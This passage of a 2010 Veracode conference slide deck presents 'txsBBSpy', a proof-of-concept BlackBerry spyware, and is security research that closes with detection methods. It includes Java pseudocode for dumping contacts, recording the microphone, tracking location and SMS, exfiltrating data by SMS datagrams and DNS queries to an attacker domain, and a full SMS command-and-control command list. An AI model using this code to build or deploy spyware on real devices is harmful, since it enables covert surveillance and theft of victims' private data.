  • 31. Installation Methods  Accessing a web site using the BlackBerry Browser and choosing to download the application over the network (OTA Installation)  Running the application loader tool of the BlackBerry Desktop Manager and choosing to download the application onto the BlackBerry device using a physical connection to the computer  Blackberry BES push the application to your user community  Get it into the Blackberry App World and let the user choose to install it for you! © 2010 Veracode, Inc. 35
  • 32. Installation Files  .COD files: A COD file is a proprietary file format developed by RIM that contains compiled and packaged application code.  .JAD files: An application descriptor that stores information about the application itself and the location of .COD files  .JAR files: a JAR file (or Java ARchive) is used for aggregating many files into one. It is generally used to distribute Java classes and associated metadata.  .ALX files: Similar to the .JAD file, in that it holds information about where the installation files for the application are located © 2010 Veracode, Inc. 36
  • 33. txsBBSpy Effects and Behaviors © 2010 Veracode, Inc. 37
  • 34. txsBBSpy Logging and Dumping Monitor connected / disconnected calls Monitor PIM added / removed / updated Monitor inbound SMS Monitor outbound SMS Real Time track GPS coordinates Dump all contacts Dump current location Dump phone logs Dump email Dump microphone capture (security prompted) © 2010 Veracode, Inc. 38
  • 35. txsBBSpy Exfiltration and C&C Methods SMS (No CDMA) SMS Datagrams (Supports CDMA) Email HTTP GET HTTP POST TCP Socket UDP Socket DNS Exfiltration Default command and control to inbound SMS TXSPROTO Bidirectional TCP based command and control © 2010 Veracode, Inc. 39
  • 36. txsBBSpy Technical Specifications © 2010 Veracode, Inc. 40
  • 37. Technical Methods  Data Dumpers  Listeners  Exfiltration Methods  Command and Control © 2010 Veracode, Inc. 41
  • 38. Dump Contact Information  API – javax.microedition.pim – net.rim.blackberry.API.pdap  Pseudocode PIM pim = PIM.getInstance(); BlackBerryPIMList contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY); Enumeration eContacts = contacts.items(); Contact contact = (Contact) eContacts.nextElement(); if (contacts.isSupportedField(Contact.EMAIL)) { if (contact.countValues(Contact.EMAIL) > 0) email = contact.getString(Contact.EMAIL, 0); } © 2010 Veracode, Inc. 42
  • 39. Dump Microphone  API – javax.microedition.media.control – javax.microedition.media.manager – javax.microedition.media.player  Pseudocode Player p = Manager.createPlayer("capture://audio"); RecordControl rc = (RecordControl)p.getControl("RecordControl"); ByteArrayOutputStream os = new ByteArrayOutputStream(); rc.setRecordStream(os); rc.startRecord(); © 2010 Veracode, Inc. 43
  • 40. Location Listener  Create the class that implements LocationListener Interface  Get LocationProvider instance  Add LocationListener  API – javax.microedition.location.LocationProvider.getInstance – javax.microedition.location.LocationProvider.setLocationListener  Pseudocode ll = new LocListener(); lp = LocationProvider.getInstance(null); lp.setLocationListener(ll, 1, 1, 1); © 2010 Veracode, Inc. 47
  • 41. SMS Outbound Listener  Create class that implements “SendListener” interface  Add the SendListener  API – net.rim.blackberry.api.sms.SMS – javax.wireless.messaging.TextMessage  Pseudocode sl = new SMSOUTListener(); SMS.addSendListener(sl); © 2010 Veracode, Inc. 48
  • 42. PIM Listener  Create the class that implements PIMListListener Interface  Open Target PIMList and Add PIMListListener  API – javax.microedition.pim.PIM.getInstance() – net.rim.blackberry.api.pdap.BlackBerryPIMList.addListener  Pseudocode pl = new PhoneLogger(); pim = PIM.getInstance(); contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY); contacts.addListener(piml); © 2010 Veracode, Inc. 51
  • 43. SMS Datagram Exfiltration  API – javax.microedition.io.Connector – javax.microedition.io.DatagramConnection – javax.microedition.io.Datagram  Pseudocode DatagramConnection dc = (DatagramConnection)Connector.open("sms://"+this.pnum+":3590 "); Datagram d = dc.newDatagram(dc.getMaximumLength()); byte[] buf = msg.getBytes(); d.setData(buf, 0, buf.length); d.write(buf, 0, buf.length); dc.send(d); © 2010 Veracode, Inc. 52
  • 44. DNS Exfiltration do { // Code to trim the message to 200 chars per iteration } try { msg2 = Base64OutputStream.encodeAsString(msg2.getBytes(), 0, msg2.length(), false, false); conn = (DatagramConnection)Connector.open("udp://"+msg2+"."+this.domain+":7272;4444 "); conn.close(); } catch (ConnectionNotFoundException e) { return; } catch (IOException e){ // Do nothing, just catch and ignore } } while (msg.length() > 200); © 2010 Veracode, Inc. 54
  • 45. Threaded Exfiltration  Listener based exfiltration methods use separate thread  Doesn‟t freeze UI interface  Queues messages outbound if network is slow  ThreadedSend extends Thread class  Uses run() method to call exfiltrate() © 2010 Veracode, Inc. 58
  • 46. Command and Control Channels  Default is inbound SMS communication  Bi-drectional TXSPROTO TCP based command and control – Additional Stealth (intentionally not completely invisible) – Allows for pretty GUI clients (basic mock up done) – Will more easily allow for control of multiple victims – Can be used to easily implement novelty attacks  Swap the contact databases of two victims  Easily have phone A call phone B  Integrated Google earth tracking of victim without parsing return email responses  Much more shenanigans! © 2010 Veracode, Inc. 59
  • 47. Command and Control Channels  initCandC(int a) – Initializes inbound SMS listener if passed a == 1 – Kills spyware otherwise – Listens for commands and acts accordingly TXSDIE TXSPHLON TXSPHLOFF TXSPIMON TXSPIMOFF TXSSLINON TXSSLINOFF TXSSLOUTON TXSSLOUTOFF TXSGLON TXSGLOFF TXSEXFILSMS TXSEXFILSMSDG TXSEXFILEMAIL TXSEXFILGET TXSEXFILPOST TXSEXFILTCP TXSEXFILUDP TXSEXFILDNS TXSDUMPGPS TXSDUMPPL TXSDUMPEMAIL TXSDUMPMIC TXSDUMPCON TXSPROTO TXSPORT[PORT] TXSPHONE:[PN] TXSURL[URL] TXSGTIME:[N] TXSPING TXS:[HOST] TXSIP:[IP] TXSEM:[EMAIL] © 2010 Veracode, Inc. 60
  • 48. Methods of Detection and Future Work © 2010 Veracode, Inc. 61
  • 49. Methods of Detection  Additional Operating System Prompts – Remove the “Trust Application” prompt requiring individual configuration  Signature Based – This is how the current anti-virus world is failing  Sandbox Based Execution Heuristics – Still requires execution in a sandbox and is reactive – Can‟t ensure complete execution  Static Decompilation and Analysis – Enumeration of sources of sensitive taint and exfiltration sinks – Control/Data flow mapping for tracing sensitive taint from source to sink – Compare findings against expected values © 2010 Veracode, Inc. 62
  • 50. Future Work (Offensive AND Defensive)  Reverse engineer .cod file format  Continued research into unobstructed installation methods (requires exploitation)  Infect PC with virus that acts as distribution hub  Research additional exfiltration methods for tunneling without prompting  Unrelated but interesting (Other cool ideas) – Memory walking for unsigned persistent and runtime storage – Combine coddec with application downloads from marketplace – Enumerate marketplace for existence of backdoors © 2010 Veracode, Inc. 63
  • 52. Conclusion  We are currently trusting the vendor application store provider for the majority of our mobile device security  Minimal methods of real time eradication or detection of spyware type activities  No easy/automated way to confirm for ourselves what the applications are actually doing © 2010 Veracode, Inc. 65
  • 53. The Monkey Steals the Berries! Questions? © 2010 Veracode, Inc. 66